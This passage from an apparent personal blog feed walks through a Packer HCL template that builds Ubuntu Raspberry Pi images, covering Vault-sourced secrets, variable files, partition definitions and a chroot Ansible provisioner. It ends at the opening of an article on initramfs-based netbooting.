</span></span><span style="display:flex;"><span><span style="color:#66d9ef">local</span> <span style="color:#e6db74">&#34;hn_ceph_key&#34;</span> {
</span></span><span style="display:flex;"><span>  expression <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault</span>(<span style="color:#e6db74">&#34;secret/cephbar&#34;, &#34;key&#34;</span>)
</span></span><span style="display:flex;"><span>  sensitive <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">source</span> <span style="color:#e6db74">&#34;arm&#34; &#34;ubuntu&#34;</span> {
</span></span><span style="display:flex;"><span>  file_urls <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;https://cdimage.ubuntu.com/ubuntu/releases/22.04/release/ubuntu-22.04.1-preinstalled-server-arm64+raspi.img.xz&#34;</span>]
</span></span><span style="display:flex;"><span>  file_checksum_url <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://cdimage.ubuntu.com/ubuntu/releases/22.04/release/SHA256SUMS&#34;</span>
</span></span><span style="display:flex;"><span>  file_checksum_type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;sha256&#34;</span>
</span></span><span style="display:flex;"><span>  file_target_extension <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;xz&#34;</span>
</span></span><span style="display:flex;"><span>  file_unarchive_cmd <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;xz&#34;, &#34;-T0&#34;, &#34;--decompress&#34;, &#34;$ARCHIVE_PATH&#34;</span>]
</span></span><span style="display:flex;"><span>  image_mount_path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${local.mountpath}&#34;</span>
</span></span><span style="display:flex;"><span>  image_build_method <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;reuse&#34;</span>
</span></span><span style="display:flex;"><span>  image_path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${var.hn_hostname}.img&#34;</span>
</span></span><span style="display:flex;"><span>  image_size <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;2.3G&#34;</span>
</span></span><span style="display:flex;"><span>  image_type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;dos&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">image_partitions</span> {
</span></span><span style="display:flex;"><span>    name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;boot&#34;</span>
</span></span><span style="display:flex;"><span>    type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;c&#34;</span>
</span></span><span style="display:flex;"><span>    start_sector <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;2048&#34;</span>
</span></span><span style="display:flex;"><span>    filesystem <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;fat&#34;</span>
</span></span><span style="display:flex;"><span>    size <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;256M&#34;</span>
</span></span><span style="display:flex;"><span>    mountpoint <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/boot/firmware&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">image_partitions</span> {
</span></span><span style="display:flex;"><span>    name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;root&#34;</span>
</span></span><span style="display:flex;"><span>    type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;83&#34;</span>
</span></span><span style="display:flex;"><span>    start_sector <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;526336&#34;</span>
</span></span><span style="display:flex;"><span>    filesystem <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ext4&#34;</span>
</span></span><span style="display:flex;"><span>    size <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;3.4G&#34;</span>
</span></span><span style="display:flex;"><span>    mountpoint <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  image_chroot_env <span style="color:#f92672">=</span> [&#34;PATH<span style="color:#f92672">=</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">usr</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">local</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">bin</span><span style="color:#960050;background-color:#1e0010">:/</span><span style="color:#66d9ef">usr</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">local</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">sbin</span><span style="color:#960050;background-color:#1e0010">:/</span><span style="color:#66d9ef">usr</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">bin</span><span style="color:#960050;background-color:#1e0010">:/</span><span style="color:#66d9ef">usr</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">sbin</span><span style="color:#960050;background-color:#1e0010">:/</span><span style="color:#66d9ef">bin</span><span style="color:#960050;background-color:#1e0010">:/</span><span style="color:#66d9ef">sbin</span><span style="color:#960050;background-color:#1e0010">&#34;</span>]
</span></span><span style="display:flex;"><span>  qemu_binary_source_path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/usr/bin/qemu-aarch64&#34;</span>
</span></span><span style="display:flex;"><span>  qemu_binary_destination_path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/usr/bin/qemu-aarch64&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">build</span> {
</span></span><span style="display:flex;"><span>  sources <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;source.arm.ubuntu&#34;</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">provisioner</span> <span style="color:#e6db74">&#34;ansible&#34;</span> {
</span></span><span style="display:flex;"><span>    extra_arguments <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>      &#34;--connection<span style="color:#f92672">=</span><span style="color:#66d9ef">chroot</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--inventory-file<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">mountpath</span><span style="color:#e6db74">}</span>,<span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--limit<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">mountpath</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;imhotep_pw<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">foobar-pw</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_hostname<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_hostname</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_netboot<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_netboot</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_host_id<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_host_id</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_ceph_key<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">hn_ceph_key</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_pi<span style="color:#f92672">=</span><span style="color:#66d9ef">true</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;--user&#34;, &#34;ubuntu&#34;</span>,
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>    playbook_file <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${path.root}/../bootstrap-ubuntu-image.yml&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><h2 id="variables">Variables</h2>
<p>The first part consists of input and local variables:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">variable</span> <span style="color:#e6db74">&#34;hn_hostname&#34;</span> {
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#66d9ef">string</span>
</span></span><span style="display:flex;"><span>  description <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Hostname for the machine which uses this image.&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">variable</span> <span style="color:#e6db74">&#34;hn_netboot&#34;</span> {
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#66d9ef">bool</span>
</span></span><span style="display:flex;"><span>  description <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Should the host netboot or should it boot from a local disk?&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">variable</span> <span style="color:#e6db74">&#34;hn_host_id&#34;</span> {
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#66d9ef">string</span>
</span></span><span style="display:flex;"><span>  description <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ID of the raspberry pi&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">local</span> <span style="color:#e6db74">&#34;mountpath&#34;</span> {
</span></span><span style="display:flex;"><span>  expression <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/tmp/packer-${uuidv4()}&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">local</span> <span style="color:#e6db74">&#34;foobar-pw&#34;</span> {
</span></span><span style="display:flex;"><span>  expression <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault</span>(<span style="color:#e6db74">&#34;secret/foobar&#34;, &#34;pw&#34;</span>)
</span></span><span style="display:flex;"><span>  sensitive <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">local</span> <span style="color:#e6db74">&#34;hn_ceph_key&#34;</span> {
</span></span><span style="display:flex;"><span>  expression <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault</span>(<span style="color:#e6db74">&#34;secret/cephbar&#34;, &#34;key&#34;</span>)
</span></span><span style="display:flex;"><span>  sensitive <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>The Packer guide on variables can be found <a href="https://www.packer.io/guides/hcl/variables">here</a>.
The difference between <code>variable</code> and <code>local</code> is that the <code>variable</code> definition
expects the variable to be set from the outside, while the <code>local</code> definition
is for purely local variables.
To decide which one to use, just ask yourself: Is this value going to change
between different Packer invocations or not?</p>
<p>My input variables are the following:</p>
<ul>
<li><em>hn_hostname</em> This is the name of the host I&rsquo;m currently creating</li>
<li><em>hn_netboot</em> Boolean determining whether the host is going to netboot or use a
local disk</li>
<li><em>hn_host_id</em> This field contains the host ID. In the case of the Raspberry Pi,
this is the serial number from <code>/proc/cpuinfo</code>.</li>
</ul>
<p>As you can see, all the input variables are things which will change from host
to host.</p>
<p>The local variables are mostly things which can be automatically gathered:</p>
<ul>
<li><em>mountpath</em> Just a random path in /tmp as a mount directory for chroot</li>
<li><em>foobar-pw</em> This variable uses Packer&rsquo;s <a href="https://www.packer.io/docs/templates/hcl_templates/functions/contextual/vault">Vault function</a> to collect a password from HashiCorp Vault. In this case,
it is the password for my Ansible user.</li>
<li><em>hn_ceph_key</em> Again Vault access, this time to get the Ceph auth key for access
to the root volume pool on the Ceph cluster</li>
</ul>
<p>You can of course use other functionality to get at your passwords in a convenient
way. The <code>sensitive=true</code> parameter tells Packer that it should not print this
value into any logs or stdout.</p>
<p>The input variables can be handed into the Packer invocation in several
different ways. The first one is via the command line like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>packer build -var <span style="color:#e6db74">&#34;foo=bar&#34;</span> ...
</span></span></code></pre></div><p>The one I chose is via variable files. These files should have the <code>.pkrvars.hcl</code>
file ending. They look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span>hn_hostname <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;mypi&#34;</span>
</span></span><span style="display:flex;"><span>hn_netboot <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>hn_host_id <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;abcdef123&#34;</span>
</span></span></code></pre></div><p>They can be handed to a Packer invocation with the <code>var-file</code> flag:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>packer build -var-file<span style="color:#f92672">=</span>./foobar.pkrvars.hcl
</span></span></code></pre></div><p>So a full run of Packer with the above variable file in <code>./mypi.pkrvars.hcl</code>
and the Packer template in <code>./pi.pkr.hcl</code> would look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>packer build -var-file<span style="color:#f92672">=</span>./mypi.pkrvars.hcl ./pi.pkr.hcl
</span></span></code></pre></div><h2 id="the-source-definition">The source definition</h2>
<p>Next comes the definition of the image source. This definition largely depends
on the builder being used, in this case <em>packer-builder-arm</em>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">source</span> <span style="color:#e6db74">&#34;arm&#34; &#34;ubuntu&#34;</span> {
</span></span><span style="display:flex;"><span>  file_urls <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;https://cdimage.ubuntu.com/ubuntu/releases/22.04/release/ubuntu-22.04-preinstalled-server-arm64+raspi.img.xz&#34;</span>]
</span></span><span style="display:flex;"><span>  file_checksum_url <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://cdimage.ubuntu.com/ubuntu/releases/22.04/release/SHA256SUMS&#34;</span>
</span></span><span style="display:flex;"><span>  file_checksum_type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;sha256&#34;</span>
</span></span><span style="display:flex;"><span>  file_target_extension <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;xz&#34;</span>
</span></span><span style="display:flex;"><span>  file_unarchive_cmd <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;xz&#34;, &#34;-T0&#34;, &#34;--decompress&#34;, &#34;$ARCHIVE_PATH&#34;</span>]
</span></span><span style="display:flex;"><span>  image_mount_path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${local.mountpath}&#34;</span>
</span></span><span style="display:flex;"><span>  image_build_method <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;reuse&#34;</span>
</span></span><span style="display:flex;"><span>  image_path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${var.hn_hostname}.img&#34;</span>
</span></span><span style="display:flex;"><span>  image_size <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;2.3G&#34;</span>
</span></span><span style="display:flex;"><span>  image_type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;dos&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">image_partitions</span> {
</span></span><span style="display:flex;"><span>    name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;boot&#34;</span>
</span></span><span style="display:flex;"><span>    type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;c&#34;</span>
</span></span><span style="display:flex;"><span>    start_sector <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;2048&#34;</span>
</span></span><span style="display:flex;"><span>    filesystem <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;fat&#34;</span>
</span></span><span style="display:flex;"><span>    size <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;256M&#34;</span>
</span></span><span style="display:flex;"><span>    mountpoint <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/boot/firmware&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">image_partitions</span> {
</span></span><span style="display:flex;"><span>    name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;root&#34;</span>
</span></span><span style="display:flex;"><span>    type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;83&#34;</span>
</span></span><span style="display:flex;"><span>    start_sector <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;526336&#34;</span>
</span></span><span style="display:flex;"><span>    filesystem <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ext4&#34;</span>
</span></span><span style="display:flex;"><span>    size <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;3.4G&#34;</span>
</span></span><span style="display:flex;"><span>    mountpoint <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  image_chroot_env <span style="color:#f92672">=</span> [&#34;PATH<span style="color:#f92672">=</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">usr</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">local</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">bin</span><span style="color:#960050;background-color:#1e0010">:/</span><span style="color:#66d9ef">usr</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">local</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">sbin</span><span style="color:#960050;background-color:#1e0010">:/</span><span style="color:#66d9ef">usr</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">bin</span><span style="color:#960050;background-color:#1e0010">:/</span><span style="color:#66d9ef">usr</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">sbin</span><span style="color:#960050;background-color:#1e0010">:/</span><span style="color:#66d9ef">bin</span><span style="color:#960050;background-color:#1e0010">:/</span><span style="color:#66d9ef">sbin</span><span style="color:#960050;background-color:#1e0010">&#34;</span>]
</span></span><span style="display:flex;"><span>  qemu_binary_source_path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/usr/bin/qemu-aarch64&#34;</span>
</span></span><span style="display:flex;"><span>  qemu_binary_destination_path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/usr/bin/qemu-aarch64&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Here, most things are self-explanatory. I&rsquo;m using Ubuntu&rsquo;s most recent 22.04
Raspberry Pi image as the base for my images. One notable option is <code>image_mount_path</code>.
This option can be left undefined and is then set to a random subdirectory
in <code>/tmp</code>. But this is not an option here, as we need to know the precise directory
for later use in the Ansible provisioner.</p>
<p>Also important are the <code>image_partitions</code> definitions. These describe what
partitions Packer can expect to find. To figure out the exact values,
the following command can be used on the future source image:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>fdisk -l &lt;IMAGE&gt;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>Disk 9e458e3cbbfebfb2e8c0d717665bc43e1c29f286: 3.79 GiB, <span style="color:#ae81ff">4068480000</span> bytes, <span style="color:#ae81ff">7946250</span> sectors
</span></span><span style="display:flex;"><span>Units: sectors of <span style="color:#ae81ff">1</span> * 512 <span style="color:#f92672">=</span> <span style="color:#ae81ff">512</span> bytes
</span></span><span style="display:flex;"><span>Sector size <span style="color:#f92672">(</span>logical/physical<span style="color:#f92672">)</span>: <span style="color:#ae81ff">512</span> bytes / <span style="color:#ae81ff">512</span> bytes
</span></span><span style="display:flex;"><span>I/O size <span style="color:#f92672">(</span>minimum/optimal<span style="color:#f92672">)</span>: <span style="color:#ae81ff">512</span> bytes / <span style="color:#ae81ff">512</span> bytes
</span></span><span style="display:flex;"><span>Disklabel type: dos
</span></span><span style="display:flex;"><span>Disk identifier: 0xdeca7dfc
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>Device                                     Boot  Start     End Sectors  Size Id Type
</span></span><span style="display:flex;"><span>9e458e3cbbfebfb2e8c0d717665bc43e1c29f286p1 *      <span style="color:#ae81ff">2048</span>  <span style="color:#ae81ff">526335</span>  <span style="color:#ae81ff">524288</span>  256M  c W95 FAT32 <span style="color:#f92672">(</span>LBA<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>9e458e3cbbfebfb2e8c0d717665bc43e1c29f286p2      <span style="color:#ae81ff">526336</span> <span style="color:#ae81ff">7946215</span> <span style="color:#ae81ff">7419880</span>  3.5G <span style="color:#ae81ff">83</span> Linux
</span></span></code></pre></div><p>That command shows all necessary information to correctly fill out the
<code>image_partitions</code> entries in the template.</p>
<p>Finally, there are the Qemu/chroot config options. The most important one is
the <code>qemu_binary_source_path</code>. This path indicates where the static loader binary
used by <code>binfmt_misc</code> is located. As the packer-builder-arm plugin uses a chroot
for provisioning, the binary <code>binfmt_misc</code> would use to run aarch64 binaries
needs to be available inside the chroot.</p>
<p>Here comes one of the few problems with this image creation setup: This config
option makes the Packer template file non-portable. This is due to the fact
that the <code>qemu-aarch64</code> not only resides in different places on different distros,
but might also have different names. For example, on my main Gentoo desktop, the
binary is located in the directory indicated in the config: <code>/usr/bin/qemu-aarch64</code>.
But in another Debian based machine, the file resides at <code>/usr/libexec/qemu-binfmt/aarch64-binfmt-P</code>.</p>
<h2 id="provisioning">Provisioning</h2>
<p>Finally, we come to the build/provisioning part. Here, I&rsquo;m using the previously
defined source and run Ansible on the mounted image, via packer-builder-arm&rsquo;s
chroot mechanism.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">build</span> {
</span></span><span style="display:flex;"><span>  sources <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;source.arm.ubuntu&#34;</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">provisioner</span> <span style="color:#e6db74">&#34;ansible&#34;</span> {
</span></span><span style="display:flex;"><span>    extra_arguments <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>      &#34;--connection<span style="color:#f92672">=</span><span style="color:#66d9ef">chroot</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--inventory-file<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">mountpath</span><span style="color:#e6db74">}</span>,<span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--limit<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">mountpath</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;imhotep_pw<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">foobar-pw</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_hostname<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_hostname</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_netboot<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_netboot</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_host_id<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_host_id</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_ceph_key<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">hn_ceph_key</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_pi<span style="color:#f92672">=</span><span style="color:#66d9ef">true</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;--user&#34;, &#34;ubuntu&#34;</span>,
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>    playbook_file <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${path.root}/../bootstrap-ubuntu-image.yml&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>The documentation of the Ansible provisioner can be found <a href="https://www.packer.io/plugins/provisioners/ansible/ansible">here</a>.</p>
<p>The <em>provisioner</em> part is the part where Packer can be used to make changes to
a source image. In this case, Ansible will be run against the image, using the
playbook indicated in the <code>playbook_file</code> entry. The <code>${path.root}</code> variable
always contains the directory where the template file lives.</p>
<p>The next part is the <code>--connection</code> Ansible parameter. This needs
to be set to <code>chroot</code>, because we&rsquo;re only doing a chroot for the image, not launching
an entire VM which could run SSH.</p>
<p>Also connected to the connection is the <code>inventory-file</code> parameter for Ansible.
Ansible always needs to operate against an inventory of hosts. This inventory
is automatically provided by Packer. The same goes for the <code>limit</code> option, which
also uses the provided inventory.</p>
<p>Next, all of the input and local variables are forwarded to the Ansible playbook.
The only interesting part here is the <code>hn_pi=true</code> variable. This is necessary
in my setup because the <code>bootstrap-ubuntu-image.yml</code> file is used not only for
Pi hosts but also other Ubuntu hosts (more on doing a full Ubuntu install with Packer
and Qemu in a later post), while still having to do a couple of Raspberry Pi
specific things.</p>
<h2 id="the-ansible-playbook">The Ansible playbook</h2>
<p>Alright, I have just realized that this article is already pretty long. I think
the Ansible playbook deserves it&rsquo;s own article coming soon.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Netboot Raspberry Pi Part III: Telling Linux Where to Boot From</title>
      <link>https://blog.mei-home.net/posts/rpi-netboot/initramfs/</link>
      <pubDate>Thu, 18 Aug 2022 22:58:12 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/rpi-netboot/initramfs/</guid>
      <description>Explanation of how Linux early boot is not magic</description>
      <content:encoded><![CDATA[<p>This is the third part of my Pi netboot series. You can find an overview and
links to the other parts in the <a href="https://blog.mei-home.net/posts/rpi-netboot/intro/">Pi netboot series overview article</a>.</p>
<p>This, to me, is the most interesting article of the entire netboot Pi
series. When I started with setting up netbooting, I had no idea how it would work.
I had a vague idea that there was a kernel command line parameter, but no idea
where it was interpreted.
Now, I know that the early boot and the <em>initramfs</em> are not voodoo magic, but
just that most mundane of Linux tech: Shell scripts. &#x1f605;
That was another magic Linux moment for me: Huh, it&rsquo;s really that simple?</p>
<p>Special thanks for pretty much this entire article go to the GitHub user
<a href="https://github.com/trickkiste">trickkiste</a>, who had an unmerged PR showing
